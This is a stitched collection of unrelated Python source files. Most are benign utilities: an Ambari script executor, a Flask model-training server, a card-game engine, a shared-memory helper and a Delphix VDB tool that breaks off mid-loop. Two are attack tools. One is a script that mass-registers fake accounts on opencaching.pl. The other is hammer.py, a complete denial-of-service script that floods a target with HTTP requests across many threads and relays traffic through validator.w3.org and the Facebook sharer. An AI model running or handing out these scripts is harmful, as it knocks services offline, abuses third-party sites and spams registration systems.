stopIndex = 10
def parseArgs(argv):
# WIP
parser = argparse.ArgumentParser()
parser.add_argument("--start", type=int)
parser.add_argument("--stop", type=int)
args = parser.parse_args()
def post_request(username):
payload = {
"allcountries": "0",
"username": username,
"email": "xoxo+"+username+"@gmail.com",
"password1": "1234",
"password2": "1234",
"TOS": "ON",
"submit": "Zarejestruj się"
}
r = requests.post("http://opencaching.pl/register.php", data=payload)
soup = BeautifulSoup(r.text, "html.parser")
wynik = soup.select(".content2-pagetitle")[0].text
return wynik
def createAccount(i, q, r):
while True:
username = q.get()
print("[%s]" % (i+1))
wynik = post_request(username)
if "Nowy użytkownik" in wynik:
r.put(username)
q.task_done()
def main(argv):
#parseArgs(argv)
#input("Press RETURN to continue...")
print("*** Launching workers")
for i in range(num_threads):
worker = Thread(target=createAccount, args=(i, jobsQueue, resultQueue,))
worker.setDaemon(True)
worker.start()
print("*** Feeding queue with usernames")
for i in range(startIndex, stopIndex):
val = newAccountNameTemplate + str(i)
jobsQueue.put(val)
print("*** Working...\n")
jobsQueue.join()
if resultQueue.empty():
print("No new users :(")
else:
print("*** List of created users")
while not resultQueue.empty():
print(resultQueue.get())
print("*** Done")
input()
if __name__ == "__main__":
sys.exit(int(main(sys.argv[1:]) or 0))
|
PythonExecutor.py | #!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import ambari_simplejson as json
import logging
import os
import subprocess
import pprint
import threading
import platform
from threading import Thread
import time
from BackgroundCommandExecutionHandle import BackgroundCommandExecutionHandle
from ambari_commons.os_check import OSConst, OSCheck
from Grep import Grep
import sys
from ambari_commons import shell
from ambari_commons.shell import shellRunner
logger = logging.getLogger()
class PythonExecutor(object):
"""
Performs functionality for executing python scripts.
Warning: class maintains internal state. As a result, instances should not be
used as a singleton for a concurrent execution of python scripts
"""
NO_ERROR = "none"
def __init__(self, tmpDir, config):
self.grep = Grep()
self.event = threading.Event()
self.python_process_has_been_killed = False
self.tmpDir = tmpDir
self.config = config
pass
def open_subprocess_files(self, tmpoutfile, tmperrfile, override_output_files):
if override_output_files: # Recreate files
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
else: # Append to files
tmpout = open(tmpoutfile, 'a')
tmperr = open(tmperrfile, 'a')
return tmpout, tmperr
def run_file(self, script, script_params, tmpoutfile, tmperrfile,
timeout, tmpstructedoutfile, callback, task_id,
override_output_files = True, handle = None, log_info_on_failure=True):
"""
Executes the specified python file in a separate subprocess.
Method returns only when the subprocess is finished.
Params arg is a list of script parameters
Timeout meaning: how many seconds should pass before script execution
is forcibly terminated
override_output_files option defines whether stdout/stderr files will be
recreated or appended.
The structured out file, however, is preserved during multiple invocations that use the same file.
"""
pythonCommand = self.python_command(script, script_params)
logger.debug("Running command " + pprint.pformat(pythonCommand))
if handle is None:
tmpout, tmperr = self.open_subprocess_files(tmpoutfile, tmperrfile, override_output_files)
process = self.launch_python_subprocess(pythonCommand, tmpout, tmperr)
# map task_id to pid
callback(task_id, process.pid)
logger.debug("Launching watchdog thread")
self.event.clear()
self.python_process_has_been_killed = False
thread = Thread(target = self.python_watchdog_func, args = (process, timeout))
thread.start()
# Waiting for the process to be either finished or killed
process.communicate()
self.event.set()
thread.join()
result = self.prepare_process_result(process.returncode, tmpoutfile, tmperrfile, tmpstructedoutfile, timeout=timeout)
if log_info_on_failure and result['exitcode']:
self.on_failure(pythonCommand, result)
return result
else:
holder = Holder(pythonCommand, tmpoutfile, tmperrfile, tmpstructedoutfile, handle)
background = BackgroundThread(holder, self)
background.start()
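# exit code 777 is a sentinel meaning the command keeps running in the background;
# the real result is delivered later through the handle callbacks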
return {"exitcode": 777}
def on_failure(self, pythonCommand, result):
"""
Log some useful information after task failure.
"""
logger.info("Command " + pprint.pformat(pythonCommand) + " failed with exitcode=" + str(result['exitcode']))
if OSCheck.is_windows_family():
cmd_list = ["WMIC path win32_process get Caption,Processid,Commandline", "netstat -an"]
else:
cmd_list = ["ps faux", "netstat -tulpn"]
shell_runner = shellRunner()
for cmd in cmd_list:
ret = shell_runner.run(cmd)
logger.info("Command '{0}' returned {1}. {2}{3}".format(cmd, ret["exitCode"], ret["error"], ret["output"]))
def prepare_process_result(self, returncode, tmpoutfile, tmperrfile, tmpstructedoutfile, timeout=None):
out, error, structured_out = self.read_result_from_files(tmpoutfile, tmperrfile, tmpstructedoutfile)
if self.python_process_has_been_killed:
error = str(error) + "\n Python script has been killed due to timeout" + \
(" after waiting %s secs" % str(timeout) if timeout else "")
returncode = 999
result = self.condenseOutput(out, error, returncode, structured_out)
logger.debug("Result: %s" % result)
return result
def read_result_from_files(self, out_path, err_path, structured_out_path):
with open(out_path, 'r') as f:
out = f.read()
with open(err_path, 'r') as f:
error = f.read()
try:
with open(structured_out_path, 'r') as fp:
structured_out = json.load(fp)
except Exception:
if os.path.exists(structured_out_path):
errMsg = 'Unable to read structured output from ' + structured_out_path
structured_out = {
'msg' : errMsg
}
logger.warn(structured_out)
else:
structured_out = {}
return out, error, structured_out
def launch_python_subprocess(self, command, tmpout, tmperr):
"""
Creates subprocess with given parameters. This functionality was moved to separate method
to make possible unit testing
"""
close_fds = None if OSCheck.get_os_family() == OSConst.WINSRV_FAMILY else True
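# On Windows (Python 2), close_fds=True cannot be combined with redirected stdout/stderr,
# so the default is kept there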
command_env = dict(os.environ)
if OSCheck.get_os_family() == OSConst.WINSRV_FAMILY:
command_env["PYTHONPATH"] = os.pathsep.join(sys.path)
for k, v in command_env.iteritems():
command_env[k] = str(v)
return subprocess.Popen(command,
stdout=tmpout,
stderr=tmperr, close_fds=close_fds, env=command_env)
def isSuccessfull(self, returncode):
return not self.python_process_has_been_killed and returncode == 0
def python_command(self, script, script_params):
#we need manually pass python executable on windows because sys.executable will return service wrapper
python_binary = os.environ['PYTHON_EXE'] if 'PYTHON_EXE' in os.environ else sys.executable
python_command = [python_binary, script] + script_params
return python_command
def condenseOutput(self, stdout, stderr, retcode, structured_out):
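# Trim stdout/stderr to the configured number of trailing lines so reported results stay small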
log_lines_count = self.config.get('heartbeat', 'log_lines_count')
result = {
"exitcode": retcode,
"stdout": self.grep.tail(stdout, log_lines_count) if log_lines_count else stdout,
"stderr": self.grep.tail(stderr, log_lines_count) if log_lines_count else stderr,
"structuredOut" : structured_out
}
return result
def python_watchdog_func(self, python, timeout):
self.event.wait(timeout)
if python.returncode is None:
logger.error("Subprocess timed out and will be killed")
shell.kill_process_with_children(python.pid)
self.python_process_has_been_killed = True
pass
class Holder:
def __init__(self, command, out_file, err_file, structured_out_file, handle):
self.command = command
self.out_file = out_file
self.err_file = err_file
self.structured_out_file = structured_out_file
self.handle = handle
class BackgroundThread(threading.Thread):
def __init__(self, holder, pythonExecutor):
threading.Thread.__init__(self)
self.holder = holder
self.pythonExecutor = pythonExecutor
def run(self):
process_out, process_err = self.pythonExecutor.open_subprocess_files(self.holder.out_file, self.holder.err_file, True)
logger.debug("Starting process command %s" % self.holder.command)
process = self.pythonExecutor.launch_python_subprocess(self.holder.command, process_out, process_err)
logger.debug("Process has been started. Pid = %s" % process.pid)
self.holder.handle.pid = process.pid
self.holder.handle.status = BackgroundCommandExecutionHandle.RUNNING_STATUS
self.holder.handle.on_background_command_started(self.holder.handle.command['taskId'], process.pid)
process.communicate()
self.holder.handle.exitCode = process.returncode
process_condensed_result = self.pythonExecutor.prepare_process_result(process.returncode, self.holder.out_file, self.holder.err_file, self.holder.structured_out_file)
logger.debug("Calling callback with args %s" % process_condensed_result)
self.holder.handle.on_background_command_complete_callback(process_condensed_result, self.holder.handle)
logger.debug("Exiting from thread for holder pid %s" % self.holder.handle.pid)
|
light_server.py | '''
pip install flask gevent requests pillow
https://github.com/jrosebr1/simple-keras-rest-api
https://gist.github.com/kylehounslow/767fb72fde2ebdd010a0bf4242371594
'''
''' Usage
python ..\scripts\classifier.py --socket=5000 --weights=weights\obj_last.weights
curl -X POST -F image=@dog.png http://localhost:5000/training/begin?plan=testplan
'''
import threading
import time
import csv
import datetime
import flask
import traceback
import sys
import os
import cv2 as cv
import argparse
import lightnet
import darknet
import socket
import requests
import get_ar_plan
import logging
logger = logging.getLogger(__name__)
app = flask.Flask(__name__)
from os.path import join
args = None
nets = []
metas = []
args_groups = []
csv_file = None
csv_writer = None
cap = None
gpu_lock = threading.Lock()
host_ip = 'localhost'
#
server_state_idle = 0
server_state_training = 1
server_state = None
server_training_status = {
'plan_name': '',
'percentage': 0,
}
server_training_status_internal = {
'folders': [],
}
def get_Host_name_IP():
try:
global host_ip
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("baidu.com", 80))
host_ip, _ = s.getsockname()
print("http://%s:5000" % host_ip)
except OSError:
print("Unable to get Hostname and IP")
@app.route("/", methods=["GET"])
def index_get():
data = vars(args)
data['usage'] = "curl -X POST -F image=@dog.png http://%s:5000/predict" % (
host_ip)
return flask.jsonify(data)
def go_idle():
global server_state, server_training_status, server_training_status_internal
server_state = server_state_idle
server_training_status['plan_name'] = ''
server_training_status['percentage'] = 0
server_training_status_internal['folders'] = []
@app.route("/training/status", methods=["GET"])
def training_status():
return flask.jsonify(server_training_status)
def training_thread_function(training_folders):
global server_state, server_training_status, server_training_status_internal
server_training_status_internal['folders'] = training_folders
import subprocess
idx = 1 # start from 1
for folder in training_folders:
bat_file = join(folder, 'train.bat')
logging.info("%s: starting", bat_file)
p = subprocess.Popen(bat_file, shell=True, stdout = subprocess.PIPE)
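# communicate() blocks until the batch script exits, so training folders run strictly one after another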
stdout, stderr = p.communicate()
print(p.returncode) # is 0 if success
logging.info("%s: finishing", bat_file)
server_training_status['percentage'] = idx * 100 / len(training_folders)
idx += 1
go_idle()
@app.route("/training/begin", methods=["GET"])
def training_begin():
global server_state, server_training_status
if server_state != server_state_idle:
result = {
'errCode': 'Busy', # 'OK/Busy/Error'
'errMsg': 'Server is busy training %s' % server_training_status['plan_name']
}
return flask.jsonify(result)
try:
server_state = server_state_training
plan = flask.request.args.get("plan")
print(plan)
server_training_status['plan_name'] = plan
server_training_status['percentage'] = 0
url = 'http://localhost:8800/api/Training/plan?plan=%s' % plan
response = requests.get(url)
plan_json = response.json()
# return flask.jsonify(result)
training_folders = get_ar_plan.prepare_training_folders(plan_json)
x = threading.Thread(target=training_thread_function, args=(training_folders,))
x.start()
result = {
'errCode': 'OK', # 'OK/Busy/Error'
'errMsg': ''
}
except Exception:
error_callstack = traceback.format_exc()
print(error_callstack)
result = {
'errCode': 'Error', # or 'Error'
'errMsg': error_callstack
}
go_idle()
return flask.jsonify(result)
def main():
# lightnet.set_cwd(dir)
global nets, metas, args, cap, args_groups
global server_state
server_state = server_state_idle
def add_bool_arg(parser, name, default=False):
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument('--' + name, dest=name, action='store_true')
group.add_argument('--no-' + name, dest=name, action='store_false')
parser.set_defaults(**{name: default})
parser = argparse.ArgumentParser()
parser.add_argument('--group', default='default')
parser.add_argument('--cfg', default='obj.cfg')
parser.add_argument('--weights', default='weights/obj_last.weights')
parser.add_argument('--names', default='obj.names')
parser.add_argument('--socket', type=int, default=5000)
parser.add_argument('--top_k', type=int, default=5)
parser.add_argument('--gold_confidence', type=float, default=0.95)
parser.add_argument('--threshold', type=float, default=0.5)
add_bool_arg(parser, 'debug')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
# flask routine
print('=========================================')
get_Host_name_IP()
print('=========================================')
app.run(host='0.0.0.0', port=args.socket, threaded=True)
if __name__ == "__main__":
main()
|
engine.py | """
This file contains functions to regulate game play.
"""
from api import State, Deck, util
from multiprocessing import Process, Manager
def play(
player1, # type: Bot
player2, # type: Bot
state, # type: State
max_time=5000, # type: int
verbose=True, # type: bool
fast=False # type: bool
):
"""
Play a game between two given players, from the given starting state.
"""
pr('player1: {}'.format(player1), verbose)
pr('player2: {}'.format(player2), verbose)
# The game loop
while not state.finished():
player = player1 if state.whose_turn() == 1 else player2
# We introduce a state signature which essentially obscures the deck's perfect knowledge from the player
given_state = state.clone(signature=state.whose_turn()) if state.get_phase() == 1 else state.clone()
move = player.get_move(given_state) if fast else get_move(given_state, player, max_time, verbose)
if is_valid(move, player): # check for common mistakes
if move[0] is None:
pr('* Player {} performs a trump jack exchange'.format(state.whose_turn()), verbose)
else:
pr('* Player {} plays: {}{}'.format(state.whose_turn(), util.get_rank(move[0]), util.get_suit(move[0])), verbose)
if move[1] is not None:
pr('* Player {} melds a marriage between {}{} and {}{}'.format(state.whose_turn(), util.get_rank(move[0]), util.get_suit(move[0]), util.get_rank(move[1]), util.get_suit(move[1])), verbose)
state = state.next(move)
pr(state, verbose)
if state.revoked() is not None:
pr('! Player {} revoked (made illegal move), game finished.'.format(state.revoked()), verbose)
else:
state.set_to_revoked()
pr('Game finished. Player {} has won, receiving {} points.'.format(state.winner()[0], state.winner()[1]), verbose)
return state.winner()
def get_move(state, player, max_time, verbose):
"""
Asks a player bot for a move. Creates a separate process, so we can kill
computation if it exceeds a maximum time.
:param state:
:param player:
:return:
"""
# We call the player bot in a separate process. This allows us to terminate
# if the player takes too long.
manager = Manager()
result = manager.dict() # result is a variable shared between our process and
# the player's. This allows it to pass the move to us
# Start a process with the function 'call_player' and the given arguments
process = Process(target=call_player, args=(player, state, result))
# Start the process
process.start()
# Rejoin at most max_time milliseconds later
process.join(max_time / 1000)
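# join() with a timeout returns when the process finishes or the timeout expires;
# is_alive() below distinguishes the two cases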
# Check if the process terminated in time
move = None
if process.is_alive():
pr('! Player {} took too long, game revoked.'.format(state.whose_turn()), verbose)
process.terminate()
process.join()
move = "Late"
else:
# extract the move
if 'move' in result:
move = result['move']
return move
def call_player(player, state, result):
# Call the player to make the move
move = player.get_move(state)
# Put the move in the shared variable, so it can be read by the
# engine process
result['move'] = move
def pr(string, verbose):
"""
Print the given message if verbose is true, otherwise ignore.
:param string: Message to print
:param verbose: Whether to print the message
"""
if(verbose):
print(string)
#Syntax checking the move
def is_valid(
move, # type: tuple[int, int]
player):
"""
Check a move for common mistakes, and throw a (hopefully) helpful error message if incorrect.
:param move:
:param player:
"""
if move == "Late":
return False
if not type(move) is tuple:
print('Bot {} returned a move {} that was not a pair (i.e. (2,3))'.format(player, move))
return False
if len(move) != 2:
print('Bot {} returned a move {} that was not of length 2.'.format(player, move))
return False
if ((type(move[0]) is not int) and (move[0] is not None)) or ((type(move[1]) is not int) and (move[1] is not None)):
print('Bot {} returned a move {} that was not a tuple for which each element is either an int or None'.format(player, move))
return False
if move[0] is None and move[1] is None:
print('Bot {} returned (None, None). At least one of the elements needs to be an integer.'.format(player))
return False
return True
|
hammer.py | #!/Library/Frameworks/Python.framework/Versions/3.4/bin/python3
# -*- coding: utf-8 -*-
# python 3.3.2+ Hammer Dos Script v.1
# by Can Yalçın
# for legal purposes only
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("uagent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("uagent=[]Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m Hammer Dos Script v.1 http://www.canyalcin.com/
It is the end user's responsibility to obey all applicable laws.
It is just a script for server testing. Your IP is visible. \n
usage : python3 hammer.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # daemon threads die when the main thread exits
try:
t.start()
except RuntimeError:
print("Hammer Failed")
t2 = threading.Thread(target=dos2)
t2.daemon = True # daemon threads die when the main thread exits
try:
t2.start()
except RuntimeError:
print("Hammer Failed")
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
easyshare.py | import ctypes
import hashlib
import multiprocessing
from multiprocessing.sharedctypes import RawValue
import threading
import json
import cPickle
class Share( property ):
__ver__ = 2
def __init__( self, _v=None, maxsize=10240, serializing=json, szarg=None ):
class ShareStructure ( ctypes.Structure ):
_fields_ = [("len", ctypes.c_long ),
("md5", ctypes.c_char* 32),
("data", ctypes.c_char* maxsize)]
if serializing == 'json' :
serializing = json
if szarg == None :
szarg = ( {'encoding':'utf-8'}, {'encoding':'utf-8'} )
elif serializing == 'pickle' :
serializing = cPickle
if szarg == None :
szarg = ({},{})
if szarg == None :
# fall back to empty dumps/loads kwargs when a serializer module
# (e.g. the default json) is passed directly instead of a name string
szarg = ({},{})
self.maxsize = maxsize
self.szarg = szarg
self.sz = serializing
self.sharestruct = ShareStructure
s = ShareStructure( 0, '', '' )
self.sharespace = RawValue( ShareStructure, 1 )
self.lock = threading.Lock()
self.value = _v
property.__init__( self, self.value_getter , self.value_setter )
def on_sharereload( self, newvalue ):
return newvalue
def value_getter( self, host ):
if self.md5 != self.sharespace.md5 :
self.lock.acquire()
try :
l = self.sharespace.len
m = self.sharespace.md5
j = self.sharespace.data
if len(j) == l and hashlib.md5(j).hexdigest() == m :
self._value = self.on_sharereload(
self.sz.loads( j, **self.szarg[1] ) )
self.md5 = m
finally :
self.lock.release()
return self._value
def value_setter( self, host, value ):
self.lock.acquire()
try :
j = self.sz.dumps( value, **self.szarg[0])
m = hashlib.md5(j).hexdigest()
l = len(j)
if l > self.maxsize :
raise Exception, 'data too large.'
self.sharespace.len = l
self.sharespace.md5 = m
self.sharespace.data = j
self.md5 = hashlib.md5(j).hexdigest()
self._value = self.on_sharereload( value )
finally :
self.lock.release()
#self.md5 = hashlib.md5(j).hexdigest()
#self._value = self.on_sharereload( value )
return
def _value_getter( self ):
return self.value_getter( self )
def _value_setter( self, value ):
return self.value_setter( self, value )
value = property( _value_getter, _value_setter )
if __name__ == '__main__' :
import time
def foo(sharevalue):
for x in xrange(4):
time.sleep(0.5)
sharevalue.value = x
s = Share()
p = multiprocessing.Process( target=foo, args=(s,) )
p.start()
for x in xrange(5):
time.sleep(0.4)
print s.value
p.join()
# since the total elapsed times coincide ( 0.4*5 == 0.5*4 ),
# the result may be : None, 0, 1, 2, 3
# or possibly : None, 0, 1, 2, 2 |
dx_operations_vdb.py | #!/usr/bin/env python
# Corey Brune - Oct 2016
#This script starts or stops a VDB
#requirements
#pip install docopt delphixpy
#The doc below follows the POSIX standard, which allows docopt to use
#it to define the script's command-line arguments as well.
"""List all VDBs or Start, stop, enable, disable a VDB
Usage:
dx_operations_vdb.py (--vdb <name> [--stop | --start | --enable | --disable] | --list)
[-d <identifier> | --engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_operations_vdb.py -h | --help | -v | --version
List all VDBs, start, stop, enable, disable a VDB
Examples:
dx_operations_vdb.py -d landsharkengine --vdb testvdb --stop
dx_operations_vdb.py --vdb testvdb --start
Options:
--vdb <name> Name of the VDB to stop or start
--start Start the VDB
--stop Stop the VDB
--list List all databases from an engine
--enable Enable the VDB
--disable Disable the VDB
-d <identifier> Identifier of Delphix engine in dxtools.conf.
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_operations_vdb.log]
-h --help Show this screen.
-v --version Show version.
"""
VERSION="v.0.0.002"
from docopt import docopt
import logging
from os.path import basename
import signal
import sys
import time
import traceback
import json
from multiprocessing import Process
from time import sleep, time
from delphixpy.v1_7_0.delphix_engine import DelphixEngine
from delphixpy.v1_7_0.exceptions import HttpError, JobError
from delphixpy.v1_7_0 import job_context
from delphixpy.v1_7_0.web import database, host, job, source
from delphixpy.v1_7_0.exceptions import RequestError, JobError, HttpError
class dlpxException(Exception):
def __init__(self, message):
self.message = message
def vdb_operation(engine, server, jobs, vdb_name, operation):
"""
Function to start, stop, enable or disable a VDB
"""
print_debug(engine['hostname'] + ': Searching for ' + vdb_name +
' reference.\n')
vdb_obj = find_obj_by_name(engine, server, source, vdb_name)
try:
if vdb_obj:
if operation == 'start':
source.start(server, vdb_obj.reference)
elif operation == 'stop':
source.stop(server, vdb_obj.reference)
elif operation == 'enable':
source.enable(server, vdb_obj.reference)
elif operation == 'disable':
source.disable(server, vdb_obj.reference)
jobs[engine['hostname']] = server.last_job
except (RequestError, HttpError, JobError, AttributeError), e:
raise dlpxException('An error occurred while performing ' +
operation + ' on ' + vdb_name + '.:%s\n' % (e))
def list_databases(engine, server, jobs):
"""
Function to list all databases for a given engine
"""
try:
databases = database.get_all(server)
for db in databases:
if db.provision_container == None:
db.provision_container = 'dSource'
print 'name = ', str(db.name), '\n', 'current timeflow = ', \
str(db.current_timeflow), '\n', 'provision container = ', \
str(db.provision_container), '\n', 'processor = ', \
str(db.processor), '\n'
except (RequestError, HttpError, JobError, AttributeError), e:
print 'An error occurred while listing databases on ' + \
engine['ip_address'] + '.:%s\n' % (e)
def find_obj_by_name(engine, server, f_class, obj_name):
"""
Function to find objects by name and object class, and return object's
reference as a string
You might use this function to find objects like groups.
"""
print_debug(engine["hostname"] + ": Searching objects in the " +
f_class.__name__ + " class\n for one named \"" +
obj_name + "\"")
obj_ref = ''
all_objs = f_class.get_all(server)
try:
for obj in all_objs:
if obj.name == obj_name:
print_debug(engine["hostname"] + ": Found a match " +
str(obj.reference))
return obj
#If the code reaches here, the object was not found.
raise dlpxException('Object %s not found in %s\n' % (obj_name,
engine['ip_address']))
except (RequestError, HttpError, JobError, AttributeError), e:
raise dlpxException('Object %s not found in %s' % (obj_name,
engine['ip_address']))
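#Usage sketch mirroring the call in main_workflow below ('testvdb' is just
# an illustrative name):
#   vdb_obj = find_obj_by_name(engine, server, database, 'testvdb')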
def get_config(config_file_path):
"""
This function reads in the dxtools.conf file
"""
#First test to see that the file is there and we can open it
try:
config_file = open(config_file_path).read()
except:
print_error("Was unable to open " + config_file_path +
". Please check the path and permissions, then try again.")
sys.exit(1)
#Now parse the file contents as json and turn them into a python
# dictionary, throw an error if it isn't proper json
try:
config = json.loads(config_file)
except:
print_error("Was unable to read " + config_file_path +
" as json. Please check file in a json formatter and " +
"try again.")
sys.exit(1)
#Create a dictionary of engines (removing the data node from the
# dxtools.json, for easier parsing)
delphix_engines = {}
for each in config['data']:
delphix_engines[each['hostname']] = each
print_debug(delphix_engines)
return delphix_engines
def logging_est(logfile_path):
"""
Establish Logging
"""
global debug
logging.basicConfig(filename=logfile_path,format='%(levelname)s:%(asctime)s:%(message)s', level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')
print_info("Welcome to " + basename(__file__) + ", version " + VERSION)
global logger
debug = arguments['--debug']
logger = logging.getLogger()
if debug == True:
logger.setLevel(10)
print_info("Debug Logging is enabled.")
def job_mode(server):
"""
This function tells Delphix how to execute jobs, based on the
single_thread variable at the beginning of the file
"""
#Synchronously (one at a time)
if single_thread == True:
job_m = job_context.sync(server)
print_debug("These jobs will be executed synchronously")
#Or asynchronously
else:
job_m = job_context.async(server)
print_debug("These jobs will be executed asynchronously")
return job_m
def job_wait():
"""
This job stops all work in the thread/process until jobs are completed.
"""
#Grab all the jobs on the server (the last 25, by default)
all_jobs = job.get_all(server)
#For each job in the list, check to see if it is running (not ended)
for jobobj in all_jobs:
if not (jobobj.job_state in ["CANCELED", "COMPLETED", "FAILED"]):
print_debug("Waiting for " + jobobj.reference + " (currently: " +
jobobj.job_state +
") to finish running against the container")
#If so, wait
job_context.wait(server,jobobj.reference)
def on_exit(sig, func=None):
"""
This function helps us end cleanly and with exit codes
"""
print_info("Shutdown Command Received")
print_info("Shutting down " + basename(__file__))
sys.exit(0)
def print_debug(print_obj):
"""
Call this function with a log message to prefix the message with DEBUG
"""
try:
if debug == True:
print "DEBUG: " + str(print_obj)
logging.debug(str(print_obj))
except:
pass
def print_error(print_obj):
"""
Call this function with a log message to prefix the message with ERROR
"""
print "ERROR: " + str(print_obj)
logging.error(str(print_obj))
def print_info(print_obj):
"""
Call this function with a log message to prefix the message with INFO
"""
print "INFO: " + str(print_obj)
logging.info(str(print_obj))
def print_warning(print_obj):
"""
Call this function with a log message to prefix the message with WARNING
"""
print "WARNING: " + str(print_obj)
logging.warning(str(print_obj))
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine):
"""
This function actually runs the jobs.
Use the @run_async decorator to run this function asynchronously.
This allows us to run against multiple Delphix Engines simultaneously
"""
#Pull out the values from the dictionary for this engine
engine_address = engine["ip_address"]
engine_username = engine["username"]
engine_password = engine["password"]
#Establish these variables as empty for use later
jobs = {}
#Setup the connection to the Delphix Engine
server = serversess(engine_address, engine_username, engine_password)
try:
if arguments['--vdb']:
#Get a reference to the database object from the database name
database_obj = find_obj_by_name(engine, server, database,
arguments['--vdb'])
except dlpxException, e:
print '\nERROR: %s\n' % (e.message)
sys.exit(1)
thingstodo = ["thingtodo"]
#reset the running job count before we begin
i = 0
with job_mode(server):
while (len(jobs) > 0 or len(thingstodo)> 0):
if len(thingstodo)> 0:
if arguments['--start']:
vdb_operation(engine, server, jobs, database_name, 'start')
elif arguments['--stop']:
vdb_operation(engine, server, jobs, database_name, 'stop')
elif arguments['--enable']:
vdb_operation(engine, server, jobs, database_name,
'enable')
elif arguments['--disable']:
vdb_operation(engine, server, jobs, database_name,
'disable')
elif arguments['--list']:
list_databases(engine, server, jobs)
thingstodo.pop()
#get all the jobs, then inspect them
i = 0
for j in jobs.keys():
job_obj = job.get(server, jobs[j])
